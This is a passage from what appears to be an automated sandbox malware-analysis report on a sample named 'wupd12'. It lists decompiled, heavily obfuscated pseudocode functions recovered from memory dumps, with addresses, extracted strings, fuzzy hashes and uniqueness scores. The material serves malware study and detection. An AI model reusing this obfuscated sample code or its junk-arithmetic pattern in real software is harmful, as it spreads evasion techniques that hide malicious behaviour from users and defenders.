				_t72 = (__eax ^ _t110) - 0x00000f53 + 0x0000e2e2 - 0xffffffffffffffcf & 0x00000272;
				_a12 = _a12 - 1;
				 *(__ebx + 0x403484) =  *(__ebx + 0x403484) + 1;
				_a4 = _a4 | _t72;
				_a12 = _a12 - 1;
				_t103 = ((_t97 + 0x00000001 ^ _t110) + 0x00000001 & 0x00000000) - 1;
				 *(__ebx + 0x403484) =  *(__ebx + 0x403484) - 1;
				_v8 = _v8 + 0x4d09;
				_v8 = _v8 - ((_t72 | 0x0000e32d) - 0x00000001 ^ 0x00003446);
				_v8 = _t103;
				_v8 = 0xd131;
				 *(__ebx + 0x403484) =  *(__ebx + 0x403484) + 0x8051;
				 *(__ebx + 0x403480) = 1;
				_a8 = 0xdf19;
				_a8 = _a8 ^ _t103 ^ 0x00000d09;
				_a4 = _a4 - 0xb4b3;
				return (_v8 & 0x000001ee) - 0xc2ec + 0x826e;
			}

0x004ccb9d
0x004ccba9
0x004ccbad
0x004ccbb3
0x004ccbc6
0x004ccbd8
0x004ccbe2
0x004ccbed
0x004ccc0a
0x004ccc15
0x004ccc1a
0x004ccc27
0x004ccc2c
0x004ccc2f
0x004ccc35
0x004ccc3e
0x004ccc46
0x004ccc49
0x004ccc4f
0x004ccc5d
0x004ccc60
0x004ccc6d
0x004ccc78
0x004ccc88
0x004ccc99
0x004ccca6
0x004cccf1
0x004ccd0b

Strings

2, xrefs: 004CCBC6
M, xrefs: 004CCC4F
;h, xrefs: 004CCCDE

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: M$;h$2
API String ID: 0-3999160109
Opcode ID: 99edfa06972fa8b6a4c96251fc4c025aac44091ad54e08749ad697e2cccd1356
Instruction ID: 3bfb71eea80370980181940c91861c5641c68dbb2c176f1c01d20ea17511aa4e
Opcode Fuzzy Hash: 99edfa06972fa8b6a4c96251fc4c025aac44091ad54e08749ad697e2cccd1356
Instruction Fuzzy Hash: F0414D729202059BFB05CF66D64A79E7BA8FB40319F14C17EEC09AE1CAC77C87249B54

Uniqueness

Uniqueness Score: 100.00%

Function 00406273, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 417UNIQUE

Download Yara Rule

APIs

GetLastError.KERNEL32(004062CA,?,?,?), ref: 004062A8

Strings

A, xrefs: 00437ABC

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: ErrorLast
String ID: A
API String ID: 1452528299-3554254475
Opcode ID: 1be45d7489e413ea2db447effdf59f12761a4cb714db39cd9402679217355747
Instruction ID: 35e9989a508a49b5e77349408d9aafa8aec91461f4a63795559aca8b3d5dcc85
Opcode Fuzzy Hash: 1be45d7489e413ea2db447effdf59f12761a4cb714db39cd9402679217355747
Instruction Fuzzy Hash: 7FF1E664D29B895EE3239A3964021A7FB585FFB589F55D30FFCE831912F32095C36244

Uniqueness

Uniqueness Score: 100.00%

Function 004C5A40, Relevance: 2.6, Strings: 2, Instructions: 113
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C5A40(signed int __eax, void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				void* _t86;
				signed int _t87;
				signed int _t89;
				void* _t99;
				signed int _t104;
				void* _t109;
				signed int _t112;
				signed int _t115;
				signed int _t116;
				void* _t126;
				signed int _t130;

				E004C7876(E004C840E((__eax & _t116) - 0x2b45 + 0x1c9d1, __ebx,  *((intOrPtr*)(__ebx + 0x499084))), __ebx,  *((intOrPtr*)(__ebx + 0x499088)));
				 *(__ebx + 0x4031f4) =  *(__ebx + 0x4031f4) + _t126;
				 *(__ebx + 0x4031f0) =  *(__ebx + 0x4031f0) + 0x8706;
				_t112 = _t109 +  *(__ebx + 0x4031f4) - 0x00000001 ^ 0x00000000;
				 *(__ebx + 0x4031f4) =  *(__ebx + 0x4031f4) | _t112;
				 *(__ebx + 0x4031f4) =  *(__ebx + 0x4031f4) + 1;
				_v8 = _v8 - 1;
				_v8 = 0x5ebc;
				 *(__ebx + 0x4031f4) =  *(__ebx + 0x4031f4) - 0xbb01;
				_t86 = E004C74DA((0 +  *(__ebx + 0x4031f0) & 0x0000290a) + 1, __ebx,  *((intOrPtr*)(__ebx + 0x499094)));
				_v8 = 0x5fa0;
				_v12 = 0x3ffb;
				_v12 = _v12 - 1;
				_t87 = E004CBA27(_t86, __ebx, _t104,  *((intOrPtr*)(__ebx + 0x499090)), __ebx,  *((intOrPtr*)(__ebx + 0x49908c)));
				_a4 = _a4 + 0x32c3;
				_a8 = _a8 - 1;
				_v8 = _v8 | (_t104 ^ 0x0000aa4e) - 0x00000001;
				_t89 = E004CBA27(E004C840E(_t87, __ebx,  *((intOrPtr*)(__ebx + 0x4035ec))), __ebx, _t104,  *((intOrPtr*)(__ebx + 0x4035e8)),  *((intOrPtr*)(__ebx + 0x4035e4)),  *((intOrPtr*)(__ebx + 0x4035e0)));
				 *(__ebx + 0x4031f4) =  *(__ebx + 0x4031f4) ^ _t89;
				_a12 = 0x1713;
				_v8 = _v8 | _t89;
				_a8 = _a8 + 1;
				_t115 = (_t112 - 0x0000c180 ^ 0x00000000) & 0x0000eb42;
				_a12 = _a12 & 0x00000000;
				_a12 = _a12 - 0x94bc;
				 *(__ebx + 0x4031f4) =  *(__ebx + 0x4031f4);
				_t130 = _t126 - 1 + 0x99fa - 1;
				 *(__ebx + 0x4031f0) =  *(__ebx + 0x4031f0) - _t115;
				_v8 = _v8 ^ 0x00002185;
				_a12 = _t130;
				_v8 = _v8 ^ 0x000077e7;
				_t99 = E004C7E65(((_t89 - 0x00000513 & 0x000019b2) + 0x0000efc6 ^ _a8) + 2 - 0xffffffffffff08f9 | 0x00007c88, __ebx,  *(__ebx + 0x4031f0) & 0x000064e9,  *((intOrPtr*)(__ebx + 0x4035f0)));
				_a8 = 0xaa0;
				_a12 = _a12 & _t115;
				 *(__ebx + 0x4031f4) = _t130;
				return _t99 - 0xffffffffffff41cb ^ 0x0000fc7d;
			}

0x004c5a7f
0x004c5a8f
0x004c5aa4
0x004c5aae
0x004c5abe
0x004c5ac4
0x004c5ad6
0x004c5ad9
0x004c5aef
0x004c5b01
0x004c5b06
0x004c5b13
0x004c5b1b
0x004c5b31
0x004c5b36
0x004c5b39
0x004c5b3c
0x004c5b5c
0x004c5b61
0x004c5b6c
0x004c5b73
0x004c5b7b
0x004c5b85
0x004c5b8d
0x004c5b91
0x004c5ba8
0x004c5baf
0x004c5bbc
0x004c5bc3
0x004c5bcf
0x004c5bd8
0x004c5beb
0x004c5bf1
0x004c5c04
0x004c5c07
0x004c5c18

Strings

w, xrefs: 004C5BD8
d, xrefs: 004C5BB2

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-901949534
Opcode ID: a627cd2e143abb824bf2684eed206c12a39d7a9d5ee420d3579c81b7f3ea6f9e
Instruction ID: d814c76c10f2df913b62623c31c4983c35dc43e44bcad53baedc87431463056c
Opcode Fuzzy Hash: a627cd2e143abb824bf2684eed206c12a39d7a9d5ee420d3579c81b7f3ea6f9e
Instruction Fuzzy Hash: 7141D472810205AFFB488F25CD47B9A7A75FF44309F08817EAC199D1DAD77D8A209B58

Uniqueness

Uniqueness Score: 100.00%

Function 004C9700, Relevance: 2.6, Strings: 2, Instructions: 111
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C9700(void* __eax, void* __ebx, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t93;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;

				 *(__ebx + 0x4034e8) =  *(__ebx + 0x4034e8) - E004C3275(__eax, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x499478)),  *((intOrPtr*)(__ebx + 0x499474)), __eax);
				_a4 = _a4 ^ _t116;
				 *(__ebx + 0x4034e8) =  *(__ebx + 0x4034e8) ^ 0x000049f1;
				 *(__ebx + 0x4034e8) =  *(__ebx + 0x4034e8) - 1;
				_v8 = _v8 | _t112;
				_a4 = _a4 - 0x9c2c;
				_v12 = 0x616;
				_t109 = _t108 & _v12;
				_a4 = _a4 - 1;
				_v16 = _v16 + 0x3401;
				_a4 = 0x594b;
				_a4 = 0x65c6;
				 *(__ebx + 0x4034ec) = _t109;
				_v16 = _v16 & 0x00000000;
				_t93 = E004CD22B((((_t86 ^ 0x0000678b) & 0x00006f6a) + 0x0000e55a & 0x00008618) + 0xade8 - 0x344e, __ebx,  *((intOrPtr*)(__ebx + 0x4039b8)),  *((intOrPtr*)(__ebx + 0x4039b4)),  *((intOrPtr*)(__ebx + 0x4039b0)));
				_v8 = _v8 ^ 0x0000dfae;
				_v12 = _v12 - 1;
				_t110 = _t109;
				_a4 = _a4 + 1;
				_a4 = _a4 - _t110;
				_t97 = ((_t93 & 0x00003c4f) - 0x0000e5a4 |  *(__ebx + 0x4034e8)) & 0x00000000;
				 *(__ebx + 0x4034e8) =  *(__ebx + 0x4034e8) ^ ((_t93 & 0x00003c4f) - 0x0000e5a4 |  *(__ebx + 0x4034e8)) & 0x00000000;
				_a4 = 0xe453;
				_v16 = _v16 & 0x00000000;
				_a4 = 0x5228;
				_a4 = _a4 | _t110;
				_a4 = _a4 - 0x286f;
				_v8 = _v8 + 1;
				_a4 = 0x191f;
				_a4 = _a4 ^ 0x00009511;
				_v12 = _v12 + _t110;
				 *(__ebx + 0x4034e8) = _t112 + 1 - _a4 - 0xfa44;
				_a4 = _a4 ^ 0x00000000;
				_a4 = _a4 + 1;
				_t104 = E004C3275((((_t97 & 0x00002bd2 ^ 0x00005455) + 0x00000001 ^ 0x0000778a) & 0x000053ef) + 0x3e8e, __ebx, 0xf09,  *((intOrPtr*)(__ebx + 0x499484)),  *((intOrPtr*)(__ebx + 0x499480)),  *((intOrPtr*)(__ebx + 0x49947c)));
				 *(__ebx + 0x4034ec) = 0x512c;
				return E004C3275(_t104 & 0x00000000, __ebx, (((0x00000000 & _v8) - _v12 | 0x0000c8e0) - 0x00000001 & 0x0000b68c) + 0x560e, __ebx,  *((intOrPtr*)(__ebx + 0x4039c0)),  *((intOrPtr*)(__ebx + 0x4039bc)));
			}

0x004c971d
0x004c9726
0x004c972e
0x004c9738
0x004c973f
0x004c9742
0x004c9750
0x004c9757
0x004c975f
0x004c9770
0x004c9787
0x004c9794
0x004c97a0
0x004c97b0
0x004c97d7
0x004c97e8
0x004c97ef
0x004c97f9
0x004c97fd
0x004c9800
0x004c9803
0x004c9808
0x004c980e
0x004c9815
0x004c9819
0x004c9820
0x004c9832
0x004c9839
0x004c984b
0x004c9852
0x004c985e
0x004c9866
0x004c9873
0x004c9877
0x004c9890
0x004c989c
0x004c98cf

Strings

o(, xrefs: 004C9832
,Q, xrefs: 004C989C

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: ,Q$o(
API String ID: 0-1496738929
Opcode ID: 01e863a0c90c0f5e735d6dd4f8e59093a0f954059ec93308aec3e996b3213f52
Instruction ID: 1618acef957b388437fcd46844c61e4cf2070f891910db8bd137881eac4cc1ae
Opcode Fuzzy Hash: 01e863a0c90c0f5e735d6dd4f8e59093a0f954059ec93308aec3e996b3213f52
Instruction Fuzzy Hash: A1418F72810608ABFF058F61C9867997F75FF40316F18C0A9EC09AE186C77D8B649F94

Uniqueness

Uniqueness Score: 100.00%

Function 004C7E65, Relevance: 2.6, Strings: 2, Instructions: 110
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C7E65(signed int __eax, void* __ebx, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _t86;
				signed int _t87;
				void* _t91;
				signed int _t94;
				void* _t96;
				signed int _t132;
				void* _t139;

				_t139 = __eflags;
				_t86 = E004CBCB5(__eax | 0x000073b4, __ebx,  *((intOrPtr*)(__ebx + 0x499150)));
				_v8 = _v8 ^ 0x0000bb84;
				_t87 = E004CBE83(_t86, __ebx,  *((intOrPtr*)(__ebx + 0x403668)),  *((intOrPtr*)(__ebx + 0x403664)),  *((intOrPtr*)(__ebx + 0x403660)));
				_a4 = _a4 & _t132;
				 *(__ebx + 0x403230) =  *(__ebx + 0x403230) ^ E004C2822(_t87 ^ 0x0000a981, __ebx,  *((intOrPtr*)(__ebx + 0x499164)),  *((intOrPtr*)(__ebx + 0x499160))) + 0x00000001;
				_t91 = E004CCED8(E004C2822(_t87 ^ 0x0000a981, __ebx,  *((intOrPtr*)(__ebx + 0x499164)),  *((intOrPtr*)(__ebx + 0x499160))) + 1, __ebx, _t139, 0x5db2);
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) & 0x00000e7e;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) - _t91 - 1;
				 *(__ebx + 0x403230) =  *(__ebx + 0x403230) - 0xbe8f;
				_a4 = _a4 | 0x00006e32;
				_a4 = _a4 & 0x0000885b;
				_a4 = _a4 + 1;
				_t94 = E004C5887( *(__ebx + 0x403234), __ebx,  *((intOrPtr*)(__ebx + 0x49915c)),  *((intOrPtr*)(__ebx + 0x499158)),  *((intOrPtr*)(__ebx + 0x499154)));
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) | 0x00005db2;
				_a4 = 0x33a1;
				_t96 = (_t94 ^ 0x0000bb1f) + 0x474b;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) + _t96;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) ^ 0x0000818e;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) + 1;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) - 1;
				_a4 = _a4 + 0xcc98;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) + 1;
				 *(__ebx + 0x403234) =  *(__ebx + 0x403234) + 1;
				 *(__ebx + 0x403230) =  *(__ebx + 0x403230) - 0x7205;
				_v8 = _v8 & 0x0000cc98;
				_v8 = _v8 ^ 0x00005db2;
				_a4 = _a4 + 0x6574;
				_v8 = _v8 + 0x7c98;
				_v8 = _v8 + 0xcc98;
				_a4 = _a4 + 0x5db2;
				_v8 = _v8 ^ 0x00005db2;
				_v8 = _v8 + 1;
				_v8 = 0x4a25;
				_a4 = 0x3e1c;
				return ((((_t96 + 0x00000001 | 0x00007d5e) ^ 0x00004be2) + 0x0000264f - 0xffffffffffff8cf8 ^ 0x4453 ^  *(__ebx + 0x403234) ^ 0x2de2) - 0x00005907 & 0x00000000 ^ 0x000069d0) & 0;
			}

0x004c7e65
0x004c7e7c
0x004c7e81
0x004c7e9a
0x004c7eaa
0x004c7ecf
0x004c7ed6
0x004c7edb
0x004c7ee6
0x004c7eef
0x004c7ef9
0x004c7f12
0x004c7f19
0x004c7f2e
0x004c7f39
0x004c7f3f
0x004c7f4b
0x004c7f52
0x004c7f5d
0x004c7f67
0x004c7f6d
0x004c7f74
0x004c7f8a
0x004c7f90
0x004c7fa2
0x004c7fb7
0x004c7fde
0x004c7fe1
0x004c7fe8
0x004c7ff9
0x004c7fff
0x004c8002
0x004c8010
0x004c802a
0x004c8036
0x004c8043

Strings

%J, xrefs: 004C802A
te, xrefs: 004C7FE1

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: %J$te
API String ID: 0-1919232041
Opcode ID: dd5e79d8552d3ae9efb72e42dd8d58178f362d62349088f6caeaccc4713cc7c6
Instruction ID: 5a074cba411743f9accd0cdb4649605db4d07d42195655af9c69f5454335e162
Opcode Fuzzy Hash: dd5e79d8552d3ae9efb72e42dd8d58178f362d62349088f6caeaccc4713cc7c6
Instruction Fuzzy Hash: C241E732C256059FFF019F35C98969A7B78FF40316F1481EDAC09AD086C73C8B209BA9

Uniqueness

Uniqueness Score: 100.00%

Function 004C7A3C, Relevance: 2.6, Strings: 2, Instructions: 107
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C7A3C(signed int __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t96;
				void* _t102;
				signed int _t133;
				signed int _t134;

				 *((intOrPtr*)(__ebx + 0x403320)) =  *((intOrPtr*)(__ebx + 0x403320)) - _t134;
				_v12 = _v12 + 0x1a8b;
				_a4 = _a4 | 0x00008a91;
				_t96 = (__eax & 0x00000000) - 0xffffffffffffcfcd;
				_v12 = _v12 - 0xf1b1;
				_a4 = _a4 ^ _t96;
				_v12 = _v12 - 0xc7bb;
				_a4 = _a4 + 0xfe08;
				_v12 = _v12 & (_t96 - 0x00000358 & 0x0000a436) + 0x0000acb5;
				_v12 = 0x53eb;
				_a4 = _a4 ^ 0x00004e05;
				_v8 = _v8 + 0xd0d2;
				_v8 = _v8 | 0x0000db74;
				 *(__ebx + 0x403324) =  *(__ebx + 0x403324) - 0x2042;
				_t102 = E004CCB92((_t96 - 0x00000358 & 0x0000a436) + 0x0000acb5 - 0x0000a140 ^ 0x000085ed, __ebx,  *((intOrPtr*)(__ebx + 0x4992c0)),  *((intOrPtr*)(__ebx + 0x4992bc)),  *((intOrPtr*)(__ebx + 0x4992b8)));
				 *(__ebx + 0x403324) =  *(__ebx + 0x403324) + 0x8fcd;
				_v8 = 0xfe08;
				E004C4FE4(_t102, __ebx,  *((intOrPtr*)(__ebx + 0x4992b4)),  *((intOrPtr*)(__ebx + 0x4992b0)),  *((intOrPtr*)(__ebx + 0x4992ac)));
				_v8 = _v8 | _t134;
				_a4 = _a4 + _t134;
				 *((intOrPtr*)(__ebx + 0x403320)) =  *((intOrPtr*)(__ebx + 0x403320)) - 1;
				 *((intOrPtr*)(__ebx + 0x403320)) =  *((intOrPtr*)(__ebx + 0x403320)) + 1;
				_a4 = _a4 | 0x0000fe08;
				_a4 = _a4;
				_t133 = _a4;
				_a4 = _a4 ^ _t133;
				_v8 = _v8 | 0x0000dde2;
				 *(__ebx + 0x403324) =  *(__ebx + 0x403324) - 1;
				 *((intOrPtr*)(__ebx + 0x403320)) =  *((intOrPtr*)(__ebx + 0x403320)) - 1;
				_v8 = 0x32d4;
				_a4 = _a4 - 1;
				 *((intOrPtr*)(__ebx + 0x403320)) =  *((intOrPtr*)(__ebx + 0x403320)) - 1;
				_a4 = _a4 & _t133;
				return E004C5366(((0xffffffffffffdd0c ^  *(__ebx + 0x403324)) + 0xafad - 0x00000001 + 0x000040f6 ^ 0x90d4) + 0x0000ab96 & 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x4037e4)),  *((intOrPtr*)(__ebx + 0x4037e0)),  *((intOrPtr*)(__ebx + 0x4037dc)));
			}

0x004c7a52
0x004c7a58
0x004c7a64
0x004c7a6b
0x004c7a71
0x004c7a78
0x004c7a91
0x004c7a94
0x004c7aab
0x004c7ab8
0x004c7ac4
0x004c7acb
0x004c7ad2
0x004c7ad9
0x004c7b01
0x004c7b07
0x004c7b15
0x004c7b2a
0x004c7b3b
0x004c7b3e
0x004c7b46
0x004c7b4c
0x004c7b54
0x004c7b63
0x004c7b6f
0x004c7b85
0x004c7b93
0x004c7bab
0x004c7bb3
0x004c7bba
0x004c7bc7
0x004c7bd9
0x004c7bdf
0x004c7c0b

Strings

B , xrefs: 004C7AD9
S, xrefs: 004C7AB8

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: B $S
API String ID: 0-2650935076
Opcode ID: 562ea6a924cdbd177c259b4fccdf6f233ba4b952bc38b4e7bdfbe03b6e32f8b0
Instruction ID: fe3d9a5db649a4d104443212529f1af261692022b270ff526bfd4342731d647d
Opcode Fuzzy Hash: 562ea6a924cdbd177c259b4fccdf6f233ba4b952bc38b4e7bdfbe03b6e32f8b0
Instruction Fuzzy Hash: 88418D72910204AFFF04CF64C98669A7EB4FF44311F58C1BEAD09AD096CB7987649B58

Uniqueness

Uniqueness Score: 100.00%

Function 004C5C1B, Relevance: 2.6, Strings: 2, Instructions: 104
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C5C1B(void* __eax, void* __ebx, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _t96;
				signed int _t105;
				signed int _t125;
				signed int _t127;
				signed int _t130;
				signed int _t134;

				 *(__ebx + 0x403464) = _t134;
				_v16 = _v16 + _t125;
				_a4 = _a4 - 0x291f;
				_v12 = 0x54fd;
				_a4 = 0xa70;
				 *(__ebx + 0x403464) =  *(__ebx + 0x403464) - 1;
				_t96 = E004CD22B(((__eax - 0x0000a508 ^ 0x00008b18) - 0x0000d343 & 0x00000000) - 0xc6fc, __ebx,  *((intOrPtr*)(__ebx + 0x499428)),  *((intOrPtr*)(__ebx + 0x499424)),  *((intOrPtr*)(__ebx + 0x499420)));
				_v12 = _v12 - 1;
				 *(__ebx + 0x403464) =  *(__ebx + 0x403464) | _t96;
				_a8 = _t96;
				_v16 = _t125;
				 *(__ebx + 0x403464) =  *(__ebx + 0x403464) & 0x00000000;
				_v12 = _v12 - 1;
				_t127 = _t125 + 1 - 1;
				E004C22CF((_t96 - 0x00002204 ^ 0x0000648d) - 0xde54, __ebx,  *((intOrPtr*)(__ebx + 0x49941c)),  *((intOrPtr*)(__ebx + 0x499418)));
				 *(__ebx + 0x403464) =  *(__ebx + 0x403464) - 1;
				 *(__ebx + 0x403464) =  *(__ebx + 0x403464) - 1;
				 *((intOrPtr*)(__ebx + 0x403460)) =  *((intOrPtr*)(__ebx + 0x403460)) - 1;
				_a4 = _a4 ^ 0x00001b52;
				_a4 = _a4 - (0x000083f0 | _t127);
				_v8 = 0x39dd;
				 *((intOrPtr*)(__ebx + 0x403460)) =  *((intOrPtr*)(__ebx + 0x403460)) - 0x4f01;
				_v16 = _v16 ^ _t127;
				_t105 = E004C9700(0x1b52, __ebx, _a8 & (_t130 & 0x00000000) + _v16 + 0x000088b4,  *((intOrPtr*)(__ebx + 0x403960)));
				_a8 = _a8 | _t127;
				_v8 = 0x7305;
				_a4 = _a4 + 1;
				 *((intOrPtr*)(__ebx + 0x403460)) = 0x884c;
				return ((_t105 ^ 0x00000000) & 8 ^ 0xb714) - 0x0000a2f4 ^ 0x0000dd00;
			}

0x004c5c32
0x004c5c3f
0x004c5c52
0x004c5c66
0x004c5c72
0x004c5c7e
0x004c5c96
0x004c5c9b
0x004c5c9e
0x004c5ca4
0x004c5cb8
0x004c5cc1
0x004c5cdc
0x004c5ce4
0x004c5cf4
0x004c5d01
0x004c5d07
0x004c5d0d
0x004c5d26
0x004c5d29
0x004c5d2c
0x004c5d33
0x004c5d3d
0x004c5d56
0x004c5d5b
0x004c5d63
0x004c5d92
0x004c5db0
0x004c5dc0

Strings

p, xrefs: 004C5C72
PN, xrefs: 004C5CCA

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: PN$p
API String ID: 0-1968466188
Opcode ID: 9efad77bfa846b4b4ad5a6aab130e9d4c91599d77523443c231c8572a7353da7
Instruction ID: af09feb4f96a3fab84c810626935b30677885ae819c8ed9b1119d6849b5b1565
Opcode Fuzzy Hash: 9efad77bfa846b4b4ad5a6aab130e9d4c91599d77523443c231c8572a7353da7
Instruction Fuzzy Hash: BC417E72814604ABFF058F69C98A79A7B74FF40315F14C0BEAC189E186C73D8621DFA5

Uniqueness

Uniqueness Score: 100.00%

Function 004C6D33, Relevance: 2.6, Strings: 2, Instructions: 103
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C6D33(signed int __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				void* _t90;
				signed int _t104;
				void* _t109;
				signed int _t116;
				void* _t125;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;

				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) - 1;
				_v8 = 0xa4b4;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) - 0x23e6;
				_t126 = _t125 +  *(__ebx + 0x40339c);
				_v12 = _v12 + 0x5c89;
				_t90 = E004C70A7((__eax & 0x0000cc4c ^ 0x0000b1b5) & 0x0000bda4, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x40387c)), _t139,  *((intOrPtr*)(__ebx + 0x403878)));
				_v12 = _v12 + 1;
				 *(__ebx + 0x40339c) = 0x15e1;
				_a8 = _a8 ^ _t125 +  *(__ebx + 0x40339c);
				_t131 = _t129 -  *(__ebx + 0x40339c) + 1;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) | _t131;
				_a4 = _a4 ^ 0x00000000;
				 *(__ebx + 0x40339c) =  *(__ebx + 0x40339c) & 0x00000000;
				_a4 = _a4 - 1;
				_t132 = _t131 - 0xfff1;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) + 1;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) & _t116;
				E004C939D(((_t90 - _v12 ^ 0x5640) + 0x00003789 - _t116 ^ 0x0000d235) - 0xa207, __ebx,  *((intOrPtr*)(__ebx + 0x403874)));
				_v8 = _v8 + 0x2743;
				_t104 = _t132 + 0x0000a94f ^ 0x0000d19d;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) + _t104;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) | 0x0000abfa;
				_v12 = _v12 - _t104;
				 *(__ebx + 0x403398) = 0x1aa1;
				_a8 = _a8 + 0xfeb5;
				_v8 = _v8 | 0x0000fd60;
				_t109 = E004C3970((_t104 ^ 0x00000000) + 0x00004e6d & (_t126 ^ 0x00000000), __ebx, _v12 & 0x0000b413,  *((intOrPtr*)(__ebx + 0x499360))) + 0xbcc2;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) | _t132 ^ _a4;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) - 1;
				_a4 = _a4 - _t109;
				_a8 = _a8 + 1;
				 *(__ebx + 0x40339c) =  *(__ebx + 0x40339c) + 0xbe89;
				 *(__ebx + 0x403398) =  *(__ebx + 0x403398) + 1;
				 *(__ebx + 0x40339c) =  *(__ebx + 0x40339c) | (((_t116 + 0x00000001 &  *(__ebx + 0x403398)) + 0x00000001 - 0x00000001 ^ 0x0000b389) + 0x00000001 & 0x00000000) + 0x00000001;
				return ((_t109 - 0x00007e25 ^ 0x00004e22) & 0x00000000) - 0x53f2;
			}

0x004c6d3e
0x004c6d45
0x004c6d51
0x004c6d66
0x004c6d6c
0x004c6d80
0x004c6d85
0x004c6d93
0x004c6da3
0x004c6da6
0x004c6da7
0x004c6dad
0x004c6db1
0x004c6db8
0x004c6dbb
0x004c6dc9
0x004c6de0
0x004c6df7
0x004c6e08
0x004c6e2a
0x004c6e30
0x004c6e36
0x004c6e41
0x004c6e4e
0x004c6e64
0x004c6e7a
0x004c6e95
0x004c6e9a
0x004c6ea0
0x004c6ea6
0x004c6eb9
0x004c6ebc
0x004c6ec6
0x004c6ede
0x004c6eed

Strings

cW, xrefs: 004C6E20
#, xrefs: 004C6D51

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: cW$#
API String ID: 0-2984931657
Opcode ID: 3ad7ccdad671a1ba9ba621cd1fc551bdf0c961482ebe918094bd9ee23ab7e444
Instruction ID: 6363f1c9b439ff384f5d0cf5f168a2404512ad590ac8d71c1d718048b6c83b0d
Opcode Fuzzy Hash: 3ad7ccdad671a1ba9ba621cd1fc551bdf0c961482ebe918094bd9ee23ab7e444
Instruction Fuzzy Hash: 38414172810605EFFB048E65C9CA7567EB8EF5132AF1880AA9C0DAD486C77C87649F54

Uniqueness

Uniqueness Score: 100.00%

Function 004CA1F8, Relevance: 2.6, Strings: 2, Instructions: 103
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004CA1F8(void* __eax, void* __ebx, void* __eflags, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
